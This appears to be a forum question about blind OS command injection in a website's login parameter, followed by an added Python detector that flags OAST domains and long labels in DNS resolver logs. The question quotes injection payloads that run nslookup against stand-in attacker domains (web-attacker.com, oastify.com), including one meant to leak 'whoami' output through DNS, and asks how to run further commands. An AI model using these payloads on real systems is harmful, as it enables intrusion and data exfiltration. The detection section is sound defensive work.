Blind OS command injection with out-of-band data exfiltration
Currently the Burp Suite scanner has found a vulnerability on the website with the following characteristics:
Issue: OS command injection. Severity: High. Confidence: Certain.
Issue detail
The login parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses. However, it is possible to cause the application to interact with an external domain, to verify that a command was executed. The payload '"0&nslookup -q=cname zvyhsfj1h2og1pio9tv7zm0ac1itbh451ttgj48.oastify.com.&
' was submitted in the login parameter. The application performed a DNS lookup for the specified domain name.
And indeed!
The web-attacker host successfully responds in "Exploiting blind operating system command injection using out-of-band":
& nslookup kgji2ohoyw.web-attacker.com &
But unfortunately the attacked website does not respond to anything else, such as "Blind OS command injection with out-of-band interaction":
& nslookup whoami
.kgji2ohoyw.web-attacker.com &
And it doesn't respond to the whoami command or anything else; it only responds to the (OAST) technique using nslookup!
I want to be able to run other commands like whoami with nslookup, ping, or anything else, since the attacked website only responds to nslookup and nothing else.
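From the defending side, the scanner finding above is visible in exactly one place: the application server's outbound DNS queries. The following is an added detection example, not code from the post or from Burp Suite, that scans constructed resolver log lines (the log format is hypothetical) and flags two signals: query names ending in a known OAST/collaborator suffix (oastify.com and web-attacker.com are taken from the post; burpcollaborator.net is Burp Collaborator's earlier public domain), and any single DNS label long enough to suggest data is being carried in the query name. The threshold `LONG_LABEL` and the helper names are assumptions.

```python
import re

# Suffixes used by out-of-band (OAST) services. oastify.com and web-attacker.com
# appear in the scanner output above; burpcollaborator.net is Burp Collaborator's
# earlier public domain.
OAST_SUFFIXES = ("oastify.com", "web-attacker.com", "burpcollaborator.net")

# A single DNS label at or above this length is unusual for ordinary hostnames
# and is the typical signature of data smuggled through a query name (assumed threshold).
LONG_LABEL = 16

# Constructed resolver log lines in a hypothetical "<ts> <client> query: <qname> <qtype>"
# shape; not any particular resolver's syntax.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 query: www.example.com A
2024-05-01T10:00:02Z 10.0.0.5 query: zvyhsfj1h2og1pio9tv7zm0ac1itbh451ttgj48.oastify.com CNAME
2024-05-01T10:00:03Z 10.0.0.5 query: kgji2ohoyw.web-attacker.com A
2024-05-01T10:00:04Z 10.0.0.7 query: mail.example.com MX
2024-05-01T10:00:05Z 10.0.0.5 query: q8w7e6r5t4y3u2i1o0p9a8s7d6f5g4h3.dnslog.example.net A
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) query: (?P<qname>\S+) (?P<qtype>\S+)$")


def is_oast_domain(qname: str) -> bool:
    """True if the query name ends in a known OAST/collaborator suffix."""
    name = qname.rstrip(".").lower()
    return any(name == s or name.endswith("." + s) for s in OAST_SUFFIXES)


def longest_label(qname: str) -> int:
    """Length of the longest dot-separated label in the query name."""
    return max((len(label) for label in qname.rstrip(".").split(".")), default=0)


def classify_query(qname: str) -> list[str]:
    """Return the reasons a query name is suspicious (empty list if none)."""
    reasons = []
    if is_oast_domain(qname):
        reasons.append("oast-domain")
    if longest_label(qname) >= LONG_LABEL:
        reasons.append("long-label")
    return reasons


def analyze_log(text: str) -> list[dict]:
    """Parse resolver log lines and return one finding per suspicious query."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected shape
        reasons = classify_query(m["qname"])
        if reasons:
            findings.append({"client": m["client"], "qname": m["qname"], "reasons": reasons})
    return findings


def clients_with_oast_traffic(text: str) -> set[str]:
    """Internal hosts that resolved an OAST domain. Because the lookup runs on
    the server itself, these hosts are the ones to review for an injectable
    parameter (here, the login parameter from the scanner finding)."""
    return {f["client"] for f in analyze_log(text) if "oast-domain" in f["reasons"]}


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["client"], f["qname"], ",".join(f["reasons"]))
```

The suffix match is a high-confidence signal, while the long-label rule is noisier (CDN and telemetry hostnames also use long labels), so in practice the two are best combined with an allowlist of known long-label domains. The root fix is on the application side: the login handler must not pass the parameter through a shell at all, which removes every variant of the payload regardless of which binary it calls.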